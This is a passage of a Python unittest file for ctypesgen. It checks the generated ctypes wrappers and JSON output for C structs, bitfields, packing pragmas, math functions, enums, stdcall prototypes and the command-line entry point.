struct foo3
{
int a;
char b;
int c;
int d : 15;
int : 17;
};
typedef int Int;
typedef struct {
int Int;
} id_struct_t;
"""
libraries = None
self.module, output = ctypesgentest.test(header_str)
self.json, output = ctypesgentest.test(header_str, output_language="json")
cleanup_json_src_paths(self.json)
def tearDown(self):
del self.module
ctypesgentest.cleanup()
def test_struct_json(self):
json_ans = [
{
"attrib": {},
"fields": [
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "a",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
"name": "b",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "c",
},
{
"bitfield": "15",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
"name": "d",
},
{
"bitfield": "17",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
"name": None,
},
],
"name": "foo",
"type": "struct",
},
{
"attrib": {"packed": True},
"fields": [
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "a",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
"name": "b",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "c",
},
{
"bitfield": "15",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
"name": "d",
},
{
"bitfield": "17",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
"name": None,
},
],
"name": "packed_foo",
"type": "struct",
},
{
"attrib": {},
"fields": [
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "a",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
"name": "b",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "c",
},
{
"bitfield": "15",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
"name": "d",
},
{
"bitfield": "17",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
"name": None,
},
],
"name": "anon_5",
"type": "struct",
},
{
"ctype": {
"Klass": "CtypesStruct",
"anonymous": True,
"errors": [],
"members": [
[
"a",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"b",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
],
[
"c",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"d",
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
],
[
None,
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
],
],
"opaque": False,
"attrib": {},
"src": ["/some-path/temp.h", 21],
"tag": "anon_5",
"variety": "struct",
},
"name": "foo_t",
"type": "typedef",
},
{
"attrib": {"packed": True},
"fields": [
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "a",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
"name": "b",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "c",
},
{
"bitfield": "15",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
"name": "d",
},
{
"bitfield": "17",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
"name": None,
},
],
"name": "anon_6",
"type": "struct",
},
{
"ctype": {
"Klass": "CtypesStruct",
"anonymous": True,
"errors": [],
"members": [
[
"a",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"b",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
],
[
"c",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"d",
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
],
[
None,
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
],
],
"opaque": False,
"attrib": {"packed": True},
"src": ["/some-path/temp.h", 30],
"tag": "anon_6",
"variety": "struct",
},
"name": "packed_foo_t",
"type": "typedef",
},
{
"attrib": {"packed": True, "aligned": [4]},
"fields": [
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "a",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
"name": "b",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "c",
},
{
"bitfield": "15",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
"name": "d",
},
{
"bitfield": "17",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
"name": None,
},
],
"name": "anon_7",
"type": "struct",
},
{
"ctype": {
"Klass": "CtypesStruct",
"anonymous": True,
"errors": [],
"members": [
[
"a",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"b",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
],
[
"c",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"d",
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
],
[
None,
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
],
],
"opaque": False,
"attrib": {"packed": True, "aligned": [4]},
"src": ["/some-path/temp.h", 40],
"tag": "anon_7",
"variety": "struct",
},
"name": "pragma_packed_foo_t",
"type": "typedef",
},
{
"attrib": {"packed": True, "aligned": [2]},
"fields": [
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "a",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
"name": "b",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "c",
},
{
"bitfield": "15",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
"name": "d",
},
{
"bitfield": "17",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
"name": None,
},
],
"name": "pragma_packed_foo2",
"type": "struct",
},
{
"attrib": {},
"fields": [
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "a",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
"name": "b",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "c",
},
{
"bitfield": "15",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
"name": "d",
},
{
"bitfield": "17",
"ctype": {
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
"name": None,
},
],
"name": "foo3",
"type": "struct",
},
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "Int",
"type": "typedef",
},
{
"attrib": {},
"fields": [
{
"ctype": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"name": "Int",
}
],
"name": "anon_8",
"type": "struct",
},
{
"ctype": {
"Klass": "CtypesStruct",
"anonymous": True,
"errors": [],
"members": [
[
"Int",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
]
],
"opaque": False,
"attrib": {},
"src": ["/some-path/temp.h", 77],
"tag": "anon_8",
"variety": "struct",
},
"name": "id_struct_t",
"type": "typedef",
},
{
"ctype": {
"Klass": "CtypesStruct",
"anonymous": False,
"errors": [],
"members": [
[
"a",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"b",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
],
[
"c",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"d",
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
],
[
None,
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
],
],
"opaque": False,
"attrib": {},
"src": ["/some-path/temp.h", 3],
"tag": "foo",
"variety": "struct",
},
"name": "foo",
"type": "typedef",
},
{
"ctype": {
"Klass": "CtypesStruct",
"anonymous": False,
"errors": [],
"members": [
[
"a",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"b",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
],
[
"c",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"d",
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
],
[
None,
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
],
],
"opaque": False,
"attrib": {"packed": True},
"src": ["/some-path/temp.h", 12],
"tag": "packed_foo",
"variety": "struct",
},
"name": "packed_foo",
"type": "typedef",
},
{
"ctype": {
"Klass": "CtypesStruct",
"anonymous": False,
"attrib": {"aligned": [2], "packed": True},
"errors": [],
"members": [
[
"a",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"b",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
],
[
"c",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"d",
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
],
[
None,
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
],
],
"opaque": False,
"src": ["/some-path/temp.h", 56],
"tag": "pragma_packed_foo2",
"variety": "struct",
},
"name": "pragma_packed_foo2",
"type": "typedef",
},
{
"ctype": {
"Klass": "CtypesStruct",
"anonymous": False,
"attrib": {},
"errors": [],
"members": [
[
"a",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"b",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "char",
"signed": True,
},
],
[
"c",
{
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
],
[
"d",
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 15,
},
"errors": [],
},
],
[
None,
{
"Klass": "CtypesBitfield",
"base": {
"Klass": "CtypesSimple",
"errors": [],
"longs": 0,
"name": "int",
"signed": True,
},
"bitfield": {
"Klass": "ConstantExpressionNode",
"errors": [],
"value": 17,
},
"errors": [],
},
],
],
"opaque": False,
"src": ["/some-path/temp.h", 66],
"tag": "foo3",
"variety": "struct",
},
"name": "foo3",
"type": "typedef",
},
]
compare_json(self, self.json, json_ans, True)
def test_fields(self):
    """Check that the generated struct_foo declares the expected _fields_ tuple list."""
    expected_fields = [
        ("a", ctypes.c_int),
        ("b", ctypes.c_char),
        ("c", ctypes.c_int),
        ("d", ctypes.c_int, 15),          # named 15-bit bitfield
        ("unnamed_1", ctypes.c_int, 17),  # anonymous bitfield gets a synthetic name
    ]
    self.assertEqual(self.module.struct_foo._fields_, expected_fields)
def test_pack(self):
    """Test whether gcc __attribute__((packed)) is interpreted correctly.

    Packed structs must carry ``_pack_ == 1`` and occupy the smaller packed
    size; unpacked structs have no ``_pack_`` attribute and use default
    (4-byte) alignment.
    """
    unpacked_size = compute_packed(4, [ctypes.c_int] * 3 + [ctypes.c_char])
    packed_size = compute_packed(1, [ctypes.c_int] * 3 + [ctypes.c_char])
    struct_foo = self.module.struct_foo
    struct_packed_foo = self.module.struct_packed_foo
    foo_t = self.module.foo_t
    packed_foo_t = self.module.packed_foo_t
    # A missing _pack_ attribute reads as the default 0 (natural alignment).
    # Fix: use the same getattr default (0) everywhere; the original used -1
    # for packed_foo_t only, an inconsistent sentinel with identical outcome.
    self.assertEqual(getattr(struct_foo, "_pack_", 0), 0)
    self.assertEqual(getattr(struct_packed_foo, "_pack_", 0), 1)
    self.assertEqual(getattr(foo_t, "_pack_", 0), 0)
    self.assertEqual(getattr(packed_foo_t, "_pack_", 0), 1)
    self.assertEqual(ctypes.sizeof(struct_foo), unpacked_size)
    self.assertEqual(ctypes.sizeof(foo_t), unpacked_size)
    self.assertEqual(ctypes.sizeof(struct_packed_foo), packed_size)
    self.assertEqual(ctypes.sizeof(packed_foo_t), packed_size)
def test_pragma_pack(self):
    """Test whether #pragma pack(...) is interpreted correctly."""
    member_types = [ctypes.c_int] * 3 + [ctypes.c_char]
    # name -> (expected _pack_ value, expected ctypes.sizeof)
    expectations = [
        ("pragma_packed_foo_t", 4, compute_packed(4, member_types)),
        ("struct_pragma_packed_foo2", 2, compute_packed(2, member_types)),
        ("foo3", 0, compute_packed(4, member_types)),  # declared after #pragma pack() reset
    ]
    pragma_packed_foo_t = self.module.pragma_packed_foo_t
    struct_pragma_packed_foo2 = self.module.struct_pragma_packed_foo2
    struct_foo3 = self.module.struct_foo3
    self.assertEqual(getattr(pragma_packed_foo_t, "_pack_", 0), expectations[0][1])
    self.assertEqual(getattr(struct_pragma_packed_foo2, "_pack_", 0), expectations[1][1])
    self.assertEqual(getattr(struct_foo3, "_pack_", 0), expectations[2][1])
    self.assertEqual(ctypes.sizeof(pragma_packed_foo_t), expectations[0][2])
    self.assertEqual(ctypes.sizeof(struct_pragma_packed_foo2), expectations[1][2])
    self.assertEqual(ctypes.sizeof(struct_foo3), expectations[2][2])
def test_typedef_vs_field_id(self):
    """Test whether local field identifier names can override external
    typedef names.
    """
    # The typedef `Int` must still resolve to c_int at module level ...
    self.assertEqual(self.module.Int, ctypes.c_int)
    # ... while a struct field named `Int` keeps its local identifier.
    self.assertEqual(self.module.id_struct_t._fields_, [("Int", ctypes.c_int)])
class MathTest(unittest.TestCase):
    """Tests for wrapped libm functions and macros (based on math_functions.py)."""

    def setUp(self):
        """NOTE this is called once for each test* method
        (it is not called once per class).
        FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
        """
        header_str = """
#include <math.h>
#define sin_plus_y(x,y) (sin(x) + (y))
"""
        if sys.platform == "win32":
            # pick something from %windir%\\system32\\msvc*dll that includes stdlib
            # Fix: the original first assigned ["msvcrt.dll"] and immediately
            # overwrote it with ["msvcrt"]; the dead assignment is removed.
            libraries = ["msvcrt"]
        elif sys.platform.startswith("linux"):
            libraries = ["libm.so.6"]
        else:
            libraries = ["libc"]
        self.module, output = ctypesgentest.test(header_str, libraries=libraries, all_headers=True)

    def tearDown(self):
        del self.module
        ctypesgentest.cleanup()

    def test_sin(self):
        """sin() must match Python's math.sin."""
        self.assertEqual(self.module.sin(2), math.sin(2))

    def test_sqrt(self):
        """sqrt() of a perfect square must be exact.

        Fix: the original body also contained a verbatim copy of the
        bad-argument check below; that duplication is removed so each test
        covers exactly one behaviour (the check still lives in
        test_bad_args_string_not_number).
        """
        self.assertEqual(self.module.sqrt(4), 2)

    def test_bad_args_string_not_number(self):
        """Passing a string where a double is expected must raise ArgumentError."""
        module = self.module

        def local_test():
            module.sin("foobar")

        self.assertRaises(ctypes.ArgumentError, local_test)

    def test_subcall_sin(self):
        """Test math with sin(x) in a macro."""
        module = self.module
        self.assertEqual(module.sin_plus_y(2, 1), math.sin(2) + 1)
class EnumTest(unittest.TestCase):
    # Verifies that a typedef'd anonymous enum is exported both as plain
    # Python constants and as the expected JSON description.

    def setUp(self):
        """NOTE this is called once for each test* method
        (it is not called once per class).
        FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
        """
        header_str = """
typedef enum {
    TEST_1 = 0,
    TEST_2
} test_status_t;
"""
        libraries = None
        # Generate a Python wrapper module and a JSON description from the same header.
        self.module, output = ctypesgentest.test(header_str)
        self.json, output = ctypesgentest.test(header_str, output_language="json")
        # Normalise machine-specific header paths so comparisons are stable.
        cleanup_json_src_paths(self.json)

    def tearDown(self):
        del self.module, self.json
        ctypesgentest.cleanup()

    def test_enum(self):
        # TEST_2 has no explicit value, so it follows TEST_1 (0) as 1.
        self.assertEqual(self.module.TEST_1, 0)
        self.assertEqual(self.module.TEST_2, 1)

    def test_enum_json(self):
        # Expected JSON: the enum body, the two derived constants, and the
        # typedef binding the anonymous enum tag to `test_status_t`.
        json_ans = [
            {
                "fields": [
                    {
                        "ctype": {"Klass": "ConstantExpressionNode", "errors": [], "value": 0},
                        "name": "TEST_1",
                    },
                    {
                        # TEST_2 is expressed as (TEST_1 + 1), not a literal.
                        "ctype": {
                            "Klass": "BinaryExpressionNode",
                            "can_be_ctype": [False, False],
                            "errors": [],
                            "format": "(%s + %s)",
                            "left": {
                                "Klass": "IdentifierExpressionNode",
                                "errors": [],
                                "name": "TEST_1",
                            },
                            "name": "addition",
                            "right": {"Klass": "ConstantExpressionNode", "errors": [], "value": 1},
                        },
                        "name": "TEST_2",
                    },
                ],
                "name": "anon_2",
                "type": "enum",
            },
            {"name": "TEST_1", "type": "constant", "value": "0"},
            {"name": "TEST_2", "type": "constant", "value": "(TEST_1 + 1)"},
            {
                "ctype": {
                    "Klass": "CtypesEnum",
                    "anonymous": True,
                    "enumerators": [
                        ["TEST_1", {"Klass": "ConstantExpressionNode", "errors": [], "value": 0}],
                        [
                            "TEST_2",
                            {
                                "Klass": "BinaryExpressionNode",
                                "can_be_ctype": [False, False],
                                "errors": [],
                                "format": "(%s + %s)",
                                "left": {
                                    "Klass": "IdentifierExpressionNode",
                                    "errors": [],
                                    "name": "TEST_1",
                                },
                                "name": "addition",
                                "right": {
                                    "Klass": "ConstantExpressionNode",
                                    "errors": [],
                                    "value": 1,
                                },
                            },
                        ],
                    ],
                    "errors": [],
                    "opaque": False,
                    "src": ["/some-path/temp.h", 2],
                    "tag": "anon_2",
                },
                "name": "test_status_t",
                "type": "typedef",
            },
        ]
        compare_json(self, self.json, json_ans)
class PrototypeTest(unittest.TestCase):
    # Verifies JSON output for function prototypes, including the stdcall
    # attribute in its several syntactic positions.

    def setUp(self):
        """NOTE this is called once for each test* method
        (it is not called once per class).
        FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
        """
        header_str = """
int bar2(int a);
int bar(int);
void foo(void);
void foo2(void) __attribute__((stdcall));
void * __attribute__((stdcall)) foo3(void);
void * __attribute__((stdcall)) * foo4(void);
void foo5(void) __attribute__((__stdcall__));
"""
        libraries = None
        self.json, output = ctypesgentest.test(header_str, output_language="json")
        # Normalise machine-specific header paths so comparisons are stable.
        cleanup_json_src_paths(self.json)

    def tearDown(self):
        del self.json
        ctypesgentest.cleanup()

    def test_function_prototypes_json(self):
        json_ans = [
            {
                # bar2: named parameter keeps its identifier.
                "args": [
                    {
                        "Klass": "CtypesSimple",
                        "errors": [],
                        "identifier": "a",
                        "longs": 0,
                        "name": "int",
                        "signed": True,
                    }
                ],
                "attrib": {},
                "name": "bar2",
                "return": {
                    "Klass": "CtypesSimple",
                    "errors": [],
                    "longs": 0,
                    "name": "int",
                    "signed": True,
                },
                "type": "function",
                "variadic": False,
            },
            {
                # bar: unnamed parameter yields an empty identifier.
                "args": [
                    {
                        "Klass": "CtypesSimple",
                        "errors": [],
                        "identifier": "",
                        "longs": 0,
                        "name": "int",
                        "signed": True,
                    }
                ],
                "attrib": {},
                "name": "bar",
                "return": {
                    "Klass": "CtypesSimple",
                    "errors": [],
                    "longs": 0,
                    "name": "int",
                    "signed": True,
                },
                "type": "function",
                "variadic": False,
            },
            {
                "args": [],
                "attrib": {},
                "name": "foo",
                "return": {
                    "Klass": "CtypesSimple",
                    "errors": [],
                    "longs": 0,
                    "name": "void",
                    "signed": True,
                },
                "type": "function",
                "variadic": False,
            },
            {
                # foo2: trailing __attribute__((stdcall)).
                "args": [],
                "attrib": {"stdcall": True},
                "name": "foo2",
                "return": {
                    "Klass": "CtypesSimple",
                    "errors": [],
                    "longs": 0,
                    "name": "void",
                    "signed": True,
                },
                "type": "function",
                "variadic": False,
            },
            {
                # foo3: stdcall between return type and name; void* becomes
                # POINTER(c_ubyte) in ctypesgen's mapping.
                "args": [],
                "attrib": {"stdcall": True},
                "name": "foo3",
                "return": {
                    "Klass": "CtypesPointer",
                    "destination": {"Klass": "CtypesSpecial", "errors": [], "name": "c_ubyte"},
                    "errors": [],
                    "qualifiers": [],
                },
                "type": "function",
                "variadic": False,
            },
            {
                # foo4: pointer-to-pointer return.
                "args": [],
                "attrib": {"stdcall": True},
                "name": "foo4",
                "return": {
                    "Klass": "CtypesPointer",
                    "destination": {
                        "Klass": "CtypesPointer",
                        "destination": {
                            # this return type seems like it really ought to be
                            # the same as for foo3
                            "Klass": "CtypesSimple",
                            "errors": [],
                            "longs": 0,
                            "name": "void",
                            "signed": True,
                        },
                        "errors": [],
                        "qualifiers": [],
                    },
                    "errors": [],
                    "qualifiers": [],
                },
                "type": "function",
                "variadic": False,
            },
            {
                # foo5: double-underscore spelling __stdcall__ is equivalent.
                "args": [],
                "attrib": {"stdcall": True},
                "name": "foo5",
                "return": {
                    "Klass": "CtypesSimple",
                    "errors": [],
                    "longs": 0,
                    "name": "void",
                    "signed": True,
                },
                "type": "function",
                "variadic": False,
            },
        ]
        compare_json(self, self.json, json_ans, True)
class LongDoubleTest(unittest.TestCase):
    """Test correct parsing and generation of the 'long double' type."""

    def setUp(self):
        """NOTE this is called once for each test* method
        (it is not called once per class).
        FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
        """
        header_str = """
struct foo
{
    long double is_bar;
    int a;
};
"""
        self.module, _ = ctypesgentest.test(header_str)  # , all_headers=True)

    def tearDown(self):
        del self.module
        ctypesgentest.cleanup()

    def test_longdouble_type(self):
        """A `long double` field must map onto ctypes.c_longdouble."""
        expected = [("is_bar", ctypes.c_longdouble), ("a", ctypes.c_int)]
        self.assertEqual(self.module.struct_foo._fields_, expected)
class MainTest(unittest.TestCase):
    """Test primary entry point used for ctypesgen when called as executable:
    ctypesgen.main.main()

    This test does not directly execute the script that is autogenerated by
    setup.py, but does instead test the entry point as used by that script by
    executing `run.py`. `run.py` is a local work-alike (as compared to the
    setuptools-autogenerated script) that is only meant to be run *in* the
    root of the source code tree.
    """
    # Fix: in the original the docstring above appeared AFTER the `script`
    # assignment, making it a discarded string expression rather than the
    # class docstring. It is now the first statement, so __doc__ is set.

    # Path of the local `run.py` entry-point work-alike.
    script = os.path.join(test_directory, os.pardir, os.pardir, "run.py")

    @staticmethod
    def _exec(args):
        """Run the entry-point script with *args*; return (stdout, stderr, returncode)."""
        if sys.platform == "win32":
            pyexec = "python"
        else:
            pyexec = "python{}".format(sys.version_info.major)
        p = Popen([pyexec, MainTest.script] + args, stdout=PIPE, stderr=PIPE)
        o, e = p.communicate()
        return o, e, p.returncode

    def test_version(self):
        """Test version string returned by script interface"""
        o, e, c = self._exec(["--version"])
        self.assertEqual(c, 0)
        self.assertEqual(o.decode().strip(), ctypesgentest.ctypesgen.VERSION)
        self.assertEqual(e.decode(), "")

    def test_help(self):
        """Test that script at least generates a help"""
        o, e, c = self._exec(["--help"])
        self.assertEqual(c, 0)
        self.assertEqual(
            o.decode().splitlines()[0], "Usage: run.py [options] /path/to/header.h ..."
        )
        self.assertGreater(len(o), 3000)  # its long, so it must be the generated help
        self.assertEqual(e.decode(), "")

    def test_invalid_option(self):
        """Test that an unknown option exits with status 2 and a usage error.

        (Fix: the original docstring was a copy-paste of test_help's.)
        """
        o, e, c = self._exec(["--oh-what-a-goose-i-am"])
        self.assertEqual(c, 2)
        self.assertEqual(o.decode(), "")
        self.assertEqual(
            e.decode().splitlines()[0], "Usage: run.py [options] /path/to/header.h ..."
        )
        self.assertIn("run.py: error: no such option: --oh-what-a-goose-i-am", e.decode())
class UncheckedTest(unittest.TestCase):
    """Fixing a bug in 1.0.0 - basic type returns of function pointers get treated as pointers"""

    def setUp(self):
        """NOTE this is called once for each test* method
        (it is not called once per class).
        FIXME This is slightly inefficient as it is called *way* more times than it needs to be.
        """
        header_str = """
typedef int (*some_type_of_answer)(void*);
"""
        self.module, self.output = ctypesgentest.test(header_str, all_headers=False)

    def tearDown(self):
        del self.module
        ctypesgentest.cleanup()

    def test_unchecked_prototype(self):
        """A function pointer returning plain int must keep c_int as its restype."""
        answer = self.module.some_type_of_answer()
        self.assertEqual(answer.restype, ctypes.c_int)
        self.assertEqual(answer.argtypes, (ctypes.c_void_p,))
def main(argv=None):
    """Run the whole test suite.

    Parameters:
